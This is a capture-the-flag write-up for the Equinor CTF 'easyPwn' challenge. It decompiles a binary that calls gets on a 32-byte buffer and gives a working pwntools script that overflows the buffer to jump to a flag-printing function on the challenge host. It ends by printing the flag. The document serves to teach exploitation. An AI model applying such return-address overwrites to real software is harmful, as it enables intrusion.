# Equinor CTF - easyPwn Writeup  Author: u$3r_H0n3$t --- **Introduction to the problem:** A nice introduction to pwn. Download the files to find the vulnerability, and exploit the host below to get the real flag. We get this address which is hosted in a docker container. nc io.ept.gg 30004  If i run the executable and add certain amount of chars i will get a segmentation fault that may indicate a buffer overflow condition. In a buffer overflow, writing more data to a buffer (like a string or array) than it can hold results in overwriting adjacent memory locations.  To attack we need to understand the program , this we do with Ghidra ## Main Main calls on hello(); ```clike= undefined8 main(void) { ignore_me_init_buffering(); hello(); return 0; } ``` ## hello(); ```clike= void hello(void) { char local_28 [32]; puts("Hello!"); puts("What\'s your name? "); gets(local_28); printf("Goodbye, %s!\n",local_28); return; } ``` ## winner(void); ```clike= void winner(void) { int __c; int iVar1; FILE *__stream; __stream = fopen("flag.txt","r"); if (__stream == (FILE *)0x0) { puts("Unable to open the file \'flag.txt\'"); } else { puts("You are Winner! Flag:"); while( true ) { __c = fgetc(__stream); iVar1 = feof(__stream); if (iVar1 != 0) break; putchar(__c); } putchar(10); fclose(__stream); } return; } ``` local_28 is defining that the buffersize is 32. For this we can use pwn tools python module. we need to attack the **For 32-bit binary use: winner_address = p32(0x401236)** ```python= # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - # ## Code:: BY morpheus and userHonest | d4rk_4rmy ## versjon 1.0. ## Date: 11/11/23 from pwn import remote, p64 io = remote('io.ept.gg', 30004) buffer_size = 32 offset = 40 winner_address = p64(0x401236) payload = b'A' * buffer_size payload += b'B' * (offset - buffer_size) payload += winner_address io.sendline(payload) print(io.recvall()) #----- end of file --- - - ``` We establish a connection to a remote service hosted at 'io.ept.gg' on port 30004 for the purpose of exploiting a buffer overflow vulnerability. It involves creating a malicious payload to overflow a buffer of a specified size. The process starts by determining the total number of bytes from the start of the buffer to the return address on the stack, known as the offset, which must be accurately determined and replaced in the code. The payload construction begins by filling the buffer with a sequence of 'A' characters up to its maximum capacity. Following this, a sequence of 'B' characters is added to reach the exact point in memory where the return address is stored. The final step in crafting the payload involves appending a specific memory address, here represented in 64-bit format and denoted as winner_address, to which the execution flow is intended to be redirected. This address, initially given as 0x401236 # Offset trouble Offset Calculation: The offset is the number of bytes you need to input before you reach the point in memory where you can overwrite the return address. The return address is a critical part of a function's stack frame, which tells the program where to go next when the function completes. In the script, the offset is set to 40. This means that there are 40 bytes from the start of the buffer to the return address on the stack. Crafting the Payload: The payload begins with 32 'A' bytes, which fill up the buffer completely. This corresponds to the buffer_size. The next part of the payload consists of 8 'B' bytes (offset - buffer_size), which are used to fill the remaining space between the end of the buffer and the return address. This part of the payload effectively overwrites what's known as the "saved frame pointer" or "old base pointer" in the stack frame, which is used to keep track of stack frames. Overwriting the Return Address: After the 40 bytes ('A's and 'B's), it places the winner_address. This address overwrites the return address on the stack. Normally, when a function finishes execution, it would return to the address specified in the return address. By overwriting this address, you redirect the program to execute code at the winner_address instead of returning to its original location.  # Flag is ```shell= EPT{S0meth1n6_2_ge7_u_5t4rt3d} ```